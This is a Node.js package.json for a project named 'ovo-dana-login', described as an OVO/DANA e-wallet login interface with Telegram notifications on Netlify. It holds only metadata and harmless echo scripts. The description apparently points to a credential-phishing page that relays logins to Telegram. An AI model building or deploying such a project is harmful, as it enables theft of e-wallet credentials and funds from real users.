{
  "name": "ovo-dana-login",
  "version": "1.0.0",
  "description": "OVO/DANA Login Interface with Telegram Notifications",
  "main": "script.js",
  "scripts": {
    "build": "echo 'Build completed'",
    "dev": "echo 'Development mode'"
  },
  "dependencies": {
    "axios": "^1.6.0"
  },
  "devDependencies": {
    "@netlify/functions": "^2.0.0"
  },
  "keywords": [
    "ovo",
    "dana",
    "login",
    "telegram",
    "netlify"
  ],
  "author": "Developer",
  "license": "MIT"
}
